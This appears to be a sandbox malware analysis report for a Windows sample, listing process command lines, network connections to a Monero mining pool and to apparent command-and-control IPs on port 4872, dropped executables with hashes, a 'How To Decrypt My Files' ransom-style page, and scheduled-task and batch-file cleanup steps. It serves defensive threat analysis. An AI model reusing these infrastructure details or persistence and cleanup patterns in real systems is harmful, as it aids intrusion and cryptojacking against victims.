"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:8
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /delete /tn "HOST" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout /T 5 /NOBREAK
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | appengine.google.com | udp |
| US | 174.61.118.194:4872 | | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 73.179.34.234:4872 | | tcp |
| US | 174.61.118.194:4872 | | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| DE | 142.250.184.195:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| DE | 142.250.185.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 88.221.135.1:443 | www.bing.com | udp |
| GB | 88.221.135.1:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 95.101.143.183:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
Files
C:\Windows\systemprocess.exe
| MD5 | b5e966fbfca567c51d5da8b2106a48e5 |
| SHA1 | 164ace9df43f1a760c1205f82c9cc4eb1dfee991 |
| SHA256 | 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8 |
| SHA512 | 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534 |
memory/3880-13-0x00007FF973523000-0x00007FF973525000-memory.dmp
C:\Windows\host.exe
| MD5 | 1cf0ec247776f6817231070a2f75994c |
| SHA1 | 3253eccccece8243d11975e7021569251def8f2f |
| SHA256 | e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051 |
| SHA512 | f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90 |
memory/3880-21-0x000001A4E37B0000-0x000001A4E3942000-memory.dmp
C:\Windows\CompPkg.exe
| MD5 | 39ba631f3e54a2c480e7c83e5e6d14ff |
| SHA1 | 82f3e3f1faf9d879a37e473a81cb5d32672af099 |
| SHA256 | 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64 |
| SHA512 | 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16 |
memory/3880-32-0x000001A4FDD10000-0x000001A4FDD2C000-memory.dmp
memory/1060-33-0x00000000006C0000-0x000000000072A000-memory.dmp
memory/2336-34-0x0000000004A50000-0x0000000004A86000-memory.dmp
memory/3880-35-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
memory/2336-36-0x00000000050C0000-0x00000000056E8000-memory.dmp
memory/2336-38-0x0000000004F70000-0x0000000004FD6000-memory.dmp
memory/2336-39-0x0000000004FE0000-0x0000000005046000-memory.dmp
memory/2336-37-0x0000000004ED0000-0x0000000004EF2000-memory.dmp
memory/2336-49-0x0000000005980000-0x0000000005CD4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yobw5zrl.eix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2336-60-0x0000000005FB0000-0x0000000005FFC000-memory.dmp
memory/2336-59-0x0000000005F80000-0x0000000005F9E000-memory.dmp
memory/3880-64-0x000001A4FDDF0000-0x000001A4FDE02000-memory.dmp
memory/3880-65-0x000001A4FDE00000-0x000001A4FDE3A000-memory.dmp
memory/3880-66-0x000001A4FE090000-0x000001A4FE0E0000-memory.dmp
memory/3880-67-0x000001A4FE1A0000-0x000001A4FE252000-memory.dmp
memory/3880-68-0x000001A4FDE40000-0x000001A4FDE8E000-memory.dmp
memory/3880-69-0x000001A4FE0E0000-0x000001A4FE12C000-memory.dmp
memory/3880-71-0x000001A4FE460000-0x000001A4FE48A000-memory.dmp
memory/3880-70-0x000001A4FE130000-0x000001A4FE17A000-memory.dmp
memory/4440-73-0x0000000006210000-0x000000000622A000-memory.dmp
memory/4440-72-0x0000000007380000-0x00000000079FA000-memory.dmp
memory/2336-75-0x00000000703A0000-0x00000000703EC000-memory.dmp
memory/2336-74-0x0000000006540000-0x0000000006572000-memory.dmp
memory/2336-85-0x0000000006520000-0x000000000653E000-memory.dmp
memory/2336-86-0x0000000007160000-0x0000000007203000-memory.dmp
memory/4440-88-0x00000000070F0000-0x0000000007182000-memory.dmp
memory/4440-87-0x0000000007FB0000-0x0000000008554000-memory.dmp
memory/2336-92-0x0000000007320000-0x000000000732A000-memory.dmp
memory/3880-93-0x000001A4FE5F0000-0x000001A4FE602000-memory.dmp
memory/3880-94-0x000001A4FE650000-0x000001A4FE68C000-memory.dmp
memory/2336-95-0x0000000007540000-0x00000000075D6000-memory.dmp
memory/2336-96-0x00000000074B0000-0x00000000074C1000-memory.dmp
memory/2336-97-0x00000000074F0000-0x00000000074FE000-memory.dmp
memory/2336-98-0x0000000007500000-0x0000000007514000-memory.dmp
memory/2336-99-0x00000000075E0000-0x00000000075FA000-memory.dmp
memory/2336-100-0x0000000007530000-0x0000000007538000-memory.dmp
memory/3880-104-0x00007FF973523000-0x00007FF973525000-memory.dmp
memory/3880-105-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
memory/3880-106-0x000001A4FE690000-0x000001A4FE6A2000-memory.dmp
memory/2592-112-0x0000018F49250000-0x0000018F49272000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b8a33aa094af018d8431665dc3e14d2f |
| SHA1 | be2e69b4850222a2263069d42aab90488b10faf2 |
| SHA256 | 42f33aec308ad7da8ae4d54a47cc23f2c1572c67a26e226abe969adebe263860 |
| SHA512 | 92c250840a6a18e2a5971ec6c2fc4a639e5c971fbef4d2efdd04f2d4c400b66696d573f4602c8d2807f2085d7e57c620405c4c6955be250488d444ee2a73b271 |
memory/704-121-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-120-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-125-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-123-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-122-0x0000000140000000-0x000000014002B000-memory.dmp
memory/6036-148-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-147-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-146-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-145-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-144-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-151-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-152-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-154-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-153-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4480-170-0x0000024ECD000000-0x0000024ECD02A000-memory.dmp
memory/4480-171-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp
memory/3148-176-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-175-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-174-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4480-172-0x00007FF990940000-0x00007FF9909FE000-memory.dmp
memory/3148-180-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-173-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-182-0x00007FF990940000-0x00007FF9909FE000-memory.dmp
memory/3148-181-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp
memory/3148-183-0x0000000140000000-0x0000000140008000-memory.dmp
memory/616-187-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
memory/616-186-0x000001C16DBD0000-0x000001C16DBF5000-memory.dmp
memory/616-188-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
memory/672-206-0x00007FF951970000-0x00007FF951980000-memory.dmp
memory/672-205-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp
memory/672-199-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp
memory/616-195-0x00007FF951970000-0x00007FF951980000-memory.dmp
memory/616-194-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa187cac09f051e24146ad549a0f08a6 |
| SHA1 | 2ef7fae3652bb838766627fa6584a6e3b5e74ff3 |
| SHA256 | 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f |
| SHA512 | 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log
| MD5 | fde7cc81ed0c50e7ce18702102f19ace |
| SHA1 | e9f02b348fda9b22bb3999b4ebef4d366f153086 |
